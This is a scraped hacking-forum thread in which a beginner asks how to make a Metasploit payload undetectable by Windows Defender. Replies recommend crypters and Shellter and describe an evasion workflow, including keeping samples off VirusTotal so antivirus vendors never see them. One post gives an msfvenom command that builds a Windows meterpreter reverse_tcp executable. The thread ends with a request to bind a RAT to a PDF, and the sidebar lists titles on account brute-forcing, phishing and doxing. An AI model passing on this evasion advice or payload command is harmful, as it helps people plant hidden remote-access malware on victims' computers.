I am new to this kali linux stuff, so far i have worked with aircrack-ng, msfvenom and meterpreter. So please help me even if my question may sound silly. Every time i want to test my payload i have to deactivate chrome and windows defender and i want to get better in this...so any ideas? Everthing i have tried so far from forums didn't work or i didn't understand some stuff...if you have a solution using gcc compiler i am open because i have 5 years in c/c++/c# programming Thanks in advance :)
Forum Thread: How Can I Make My Payload Undetectable?
- Hot
- Active
-
Forum Thread: Hack Instagram Account Using BruteForce 203 Replies
28 min ago -
Forum Thread: Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce 161 Replies
2 hrs ago -
Forum Thread: How to Edit Some Specific Part of an Apk File 1 Replies
2 hrs ago -
Forum Thread: I Need Help in Hacking a Gmail Account. 26 Replies
4 hrs ago -
Forum Thread: Kali linux command error. Kindly help 1 Replies
23 hrs ago -
Forum Thread: When to Use Reverse Shell and Bind Shell? 5 Replies
2 days ago -
Forum Thread: Fluxion Not Working 6 Replies
2 days ago -
Forum Thread: Hacking Stream (LIVE) 10 Replies
3 days ago -
Forum Thread: Blind SQL Injection 6 Replies
3 days ago -
Forum Thread: Can C Programming Help Me for Hacking or Pen Testing. 10 Replies
1 wk ago -
Forum Thread: I Want to Hack in to My Friends System Through his wifi router i am controlling 7 Replies
1 wk ago -
Forum Thread: How to Use the Exploits Found in Vega Scan 3 Replies
1 wk ago -
Forum Thread: Can I Send a File to a Computer Using Ip Address 5 Replies
2 wks ago -
Forum Thread: How to Use NGROK in a Reverse_Tcp Attack? 20 Replies
2 wks ago -
Forum Thread: Problem with Hacking Webserver with Armitage 11 Replies
2 wks ago -
Forum Thread: Metasploit - Embedding an Android Payload into a PDF? 7 Replies
2 wks ago -
Forum Thread: Creating an Completely Undetectable Executable in Under 15 Minutes! 35 Replies
2 wks ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 43 Replies
2 wks ago -
Forum Thread: Metasploit Use Domain Name as RHOST 4 Replies
2 wks ago -
Forum Thread: Make a Phishing Page for Harvesting Credentials Yourself 4 Replies
2 wks ago
-
How To: Automate Remote SSH Control of Computers with Expect Scripts
-
How To: Hack Android Using Kali (Remotely)
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Phish for Social Media & Other Account Passwords with BlackEye
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Create a Persistent Back Door in Android Using Kali Linux:
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Crack Password-Protected ZIP Files, PDFs & More with Zydra
-
How To: Bypass File Upload Restrictions on Web Apps to Get a Shell
-
How To: Dox Anyone
-
Hack Like a Pro: How to Crack Passwords, Part 4 (Creating a Custom Wordlist with Crunch)
-
How To: Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
Hack Like a Pro: How to Find Directories in Websites Using DirBuster
-
How To: How Hackers Use Your IP Address to Hack Your Computer & How to Stop It
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
21 Responses
There is almost no way unless you code it yourself now, AV detection is strong, now Veil-Evasion, Shelter, The fat rat (These are the payload encrypter)doesn't work.
Can you tell me how to do this or where to learn?
I have tried some example to copy some rows from msfvenom /x64/..... And some random character string in the code, i have compiled it but the dimension of the file was only 7kb compared to 70 from normal msfvenom, yes the windows defender hasnt found it but when i tried to run it, it gave me a warrning screen with publisher and something
Then you can also encrypt the normal payload by using your own encryption method or there are plenty of encrypters on github.
How do i encrypt it?
All of them use tools like you said before fatrat, vile
Because AV is used to base64 encryption that is from Veil and other payload hider, but if it is a encryption that was never used before in payloads it will work.
For example, there is Malbolge language, which is hard to decrypt
How can i make my own encrypting program?
If those programs don't work, you are using the wrong exe. I know for a fact that Shellter still works perfectly.
inbox me?
You can use Shellter. It's very simple to use and will make it mostly undetectable.
Go to my profile and read my tutorial. You can skip Part 1 entirety.
Shellter works best using a new exe file that was not already detectable.
Thanks a lot i will check it out tomorow and tell you how it worked
Hey thanks a lot, your shellter tutorial worked but i have some questions
virtual hug
i tried again today with shellter and windows defender detects it :((
Told ya. Those are old now.
Then why does it work perfectly for me?
Well, it detects mine though. Probably in 2018 it will be detected.
Have you tried on windows defender?
Yes. What I do is what's in my tutorial. Create an exe with Iexpress in Windows. Use the newest version of Shellter and inject the shell code. I have tested it on my windows 10 machine which has windows Defender and Malwarebytes Antimalware and neither detects it. Make sure you DO NOT upload to virus total, it will get detected by some AV, especially if you have your listener running, and they share the exe with every AV.
So i dont shell the payload created with msfvenom?
What payload are you creating with msfvenom?
msfvenom -p windows/meterpreter/reverse_tcp lhost and lport -e cmd/powershell_base64(not sure if this helps with anything) -i 4 -f exe > something.exe
PLEASE MY MASTERS ,IS THERE A WAY TO BIND A RAT VIRUS TO PDF USING KALI LINUS OR METASPLOIT?
Share Your Thoughts